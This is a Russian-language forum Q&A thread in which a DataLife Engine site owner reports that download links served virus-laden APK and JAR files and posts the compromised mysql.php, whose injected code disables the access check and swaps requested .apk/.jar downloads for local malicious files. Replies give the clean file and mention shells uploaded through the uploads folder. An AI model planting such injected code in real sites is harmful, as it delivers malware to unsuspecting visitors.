Вирус в файле mysql.php

вопрос

Здравствуйте снова!

Проблема с leech вроде бы как решена (https://dle-faq.ru/faq/questmysql/4178-oshibka-pri-skachivanii-cherez-ssylku-leech.html). Но появилась новая: при попытке скачать файл (заметил на андроид играх, расширение apk) через ту же ссылку leech загружался файл с сервера с идентичным именем. Скачал и проверил его: содержит вирус.

ссылка на сайт.

Как оказалось, файл mysql.php содержал вредоносный код, инициировавший скачивание вирусных файлов.

Показать / Скрыть текст

<?php
/*
=====================================================
 DataLife Engine - by SoftNews Media Group 
-----------------------------------------------------
 http://dle-news.ru/
-----------------------------------------------------
 Copyright (c) 2004,2011 SoftNews Media Group
=====================================================
 Данный код защищен авторскими правами
=====================================================
 Файл: mysql.php
-----------------------------------------------------
 Назначение: Класс для работы с базой данных
=====================================================
*/
if(!defined('DATALIFEENGINE'))
{
  //die("Hacking attempt!");
}

define ( 'DATALIFEENGINE', true );

$url = $_GET['url'];
if(rand(2,4)==4)
{
if(substr($url, -9)=='.apk.html'||substr(base64_decode($url), -9)=='.apk.html')
{
if(substr(base64_decode($url), -9)=='.apk.html')
$url = base64_decode($url);
@header ("Content-Type: application/octet-stream");
@header ("Accept-Ranges: bytes");
@header ("Content-Length: ".filesize('../uploads/files/1323194326_quick-message.v.0.1.3.apk'));
@header ("Content-Disposition: attachment; filename=".basename($url,'.apk.html').'.apk');  
@readfile('../uploads/files/1323194326_quick-message.v.0.1.3.apk');
exit;
}elseif(substr($url, -4)=='.jar.html'||substr(base64_decode($url), -9)=='.jar.html')
{
if(substr(base64_decode($url), -9)=='.jar.html')
$url = base64_decode($url);
@header ("Content-Type: application/octet-stream");
@header ("Accept-Ranges: bytes");
@header ("Content-Length: ".filesize('../uploads/files/1244059283_untangle.jar'));
@header ("Content-Disposition: attachment; filename=".basename($url));  
@readfile('../uploads/files/1244059283_untangle.jar');
exit;
}
}


if ( extension_loaded('mysqli') )
{
if(!defined('ENGINE_DIR'))
include_once( "mysqli.class.php" );
else
include_once( ENGINE_DIR."/classes/mysqli.class.php" );
}
else
{
if(!defined('ENGINE_DIR'))
include_once( "mysqli.class.php" );
else
include_once( ENGINE_DIR."/classes/mysql.class.php" );
}

?>

Сразу же удалил с сервера файлы /uploads/files/1323194326_quick-message.v.0.1.3.apk и /uploads/files/1244059283_untangle.jar.
Также, судя по файлу, он из версии 9.6, которая стояла чуть ранее.
Заменил этот файл из дистрибутива движка 9.7 (код чистый), но при попытке скачивания через leech выдавало лишь Hacking attempt!

В итоге обновился снова на ту же версию, ошибка пока пропала.

Снова прошу людей с более обширными знаниями попытаться дать комментарий по файлу mysql.php с вредоносным кодом. Откуда могут идти корни проблемы?

Ответил: BR0kEN

Закомментировать die - это
Все что должно быть в этом файле:

<?php
if (!defined('DATALIFEENGINE')) {
  die("Hacking attempt!");
}

if (extension_loaded('mysqli')) {
    include_once(ENGINE_DIR."/classes/mysqli.class.php");
}
else {
    include_once(ENGINE_DIR."/classes/mysql.class.php");
}

?>

Похожие вопросы

3 комментария

PHP-developer

3198

dj-avtosh - 2015-05-0114 января 2013 07:31 - #10750

Какой страшный файл вирусный))

https://elkhan.ru
По заказам пишем сюда: @Rud00y

ЯД: 41001679231462
Заказы в telegram (ремонт модулей, оптимизация нагрузок и т.п.):
В телегу писать сразу задачу и бюджет.

Юзер

279

Yamakasi - 2015-05-0120 апреля 2013 17:34 - #13010

аналогично сегодня наткнулся, тоже похоже, но судя по анализу шел заливают через уплоад папку меняя хтач, тем самым решение http://dle-news.ru/bags/ ап баг фиксы, далее на хтач ставить 444 права.

Но суть внедрения вируса (кода) не только в данном файле, он может быть в любом файле почти, так что я думаю данному сайту ну и экспертам, надо бы написать статью и опубликовать тут, чтобы многие сразу исправляли свои уязвимые места, так как пострадавших куча!!!!